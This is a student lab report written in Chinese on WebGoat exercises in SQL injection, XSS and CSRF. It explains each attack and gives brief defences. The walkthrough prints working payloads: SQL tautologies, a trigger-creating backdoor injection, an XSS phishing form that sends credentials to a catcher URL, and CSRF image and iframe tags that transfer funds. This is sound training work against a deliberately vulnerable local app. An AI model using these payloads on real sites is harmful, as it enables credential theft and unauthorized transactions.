2018-2019-2 20165313 《网络对抗技术》 Exp 9 Web安全基础

一、实验要求

本实践的目标理解常用网络攻击技术的基本原理，做不少于7个题目，共3.5分。包括(SQL,XSS,CSRF)。Webgoat实践下相关实验。

二、实验问题回答

（1）SQL注入攻击原理，如何防御

原理：

SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是，在输入字符串中嵌入SQL指令，在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行，可能实现对后台数据库进行各种操作，甚至造成破坏后台数据库等严重后果。

SQL注入一般分为普通注入和盲注：

普通注入：后台数据库会回显有价值的提示信息，通过这些可能的报错信息可以更容易地进行注入，适合新手入门训练。

盲注：后台管理员在给出错误页面时，没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息（比如时间差）对表中的每一个字段进行探测，从而实现注入。

防御：

对输入的数据进行过滤，过滤掉敏感字符。加密数据库。

（2）XSS攻击的原理，如何防御

原理：

攻击者利用网站漏洞（通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤），输入可以显示在页面上的、对其他用户造成影响的HTML代码；由于受害者浏览器对目标服务器的信任，当其访问目标服务器上被注入恶意脚本的页面后，这段恶意脚本可以顺利执行，实现获取用户cookie并可以利用用户身份进行非法操作的目的。

防御：

表单提交的时候进行特殊字符的检测。

消除网站的XSS漏洞，网站开发者运用转义安全字符手段。

（3）CSRF攻击原理，如何防御

原理：

CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统，类似于钓鱼。如用户当前已经登录了邮箱，或bbs，同时用户又在使用另外一个，已经被你控制的站点，我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你，你去点击一下，此时可能就会触发一个js的点击事件，构造一个bbs发帖的请求，去往你的bbs发帖，由于当前你的浏览器状态已经是登陆状态，所以session登陆cookie信息都会跟正常的请求一样，纯天然的利用当前的登陆状态，让用户在不知情的情况下，帮你发帖或干其他事情。

防御：

对于每一个重要的post提交页面，都使用一个验证码

每一个网页包含一个web server产生的token, 提交时，也将该token提交到服务器，服务器进行判断，如果token不对，就判定为CSRF攻击

实验过程

一、Webgoat安装

1.下载webgoat-container-7.0.1-war-exec.jar文件

2、在含有该文件的目录下使用命令java -jar webgoat-container-7.0.1-war-exec.jar运行Webgoat，出现信息: Starting ProtocolHandler ["http-bio-8080"]说明开启成功，实验过程中不能关闭终端

3、在浏览器中输入http://localhost:8080/WebGoat进入WebGoat登录界面

4、使用默认用户名密码guest登录即可

SQL攻击

1.Numeric SQL Injection

右键点击页面，选择inspect Element审查网页元素对源代码进行修改，在选中的城市编号Value值中添加or 1=1:



攻击成功，显示所有城市的天气情况:

2.Log Spoofing

利用入回车（0D%）和换行符（%0A），在 username 中填入zch%0d%0aLogin Succeeded for username: admin,攻击成功：

3.String SQL Injection

根据题目要求输入：Smith。可以看到查询的相关信息，语句为SELECT * FROM user_data WHERE last_name = 'Smith'

注入永真式'or 1='1攻击成功：

4.LAB: SQL Injection

Stage 1: String SQL Injection：

输入or 1=1 --进行SQL注入，失败；查看源码发现是对输入长度进行了限制，修改源码再次注入，成功。

5Database Backdoors

首先验证一下语句，在````user ID输入101; update employee set salary=5000,```可以看到更新的数据

进行注入101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHEREuserid = NEW.userid创建后门:

XSS攻击

1.Phishing with XSS

在搜索框中直接输入要进行xss的攻击代码。参考编写，添加一个form可以让用户输入用户名和密码，再使这些信息能够发送给网站并显示:

</form>
<script>
    function hack(){
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

点击search，出现表单，输入信息,攻击成功:

2.Stored XSS Attacks

创建非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容；命名title，在message里输入一串js代码：<script>alert("boy next door");</script>，点击刚刚创建的帖子，弹出窗口

3.Reflected XSS Attacks

输入错误用户信息后，服务器校验输入有误，返回错误页面并将错误内容展示。如果输入一个攻击URL就会返回该信息。输入,提交:

CRSF攻击

1.Cross Site Request Forgery(CSRF)

写一个URL放进Message框，使其他用户不可见，设置成一个隐藏图片，用户一旦点击就会触发一个CSRF事件;在Message里输入<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />;点击该消息，页面就会下载这个消息并显示，就会执行转走用户的存款。

2.CSRF Prompt By-Pass

message框中输入：

<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>

查看消息，看到转账消息:

实验中的问题

登录webgoat，无菜单栏。

解决方案：更换虚拟机（原因可能是KALI版本高，安装的JDK版本过高，无法适应）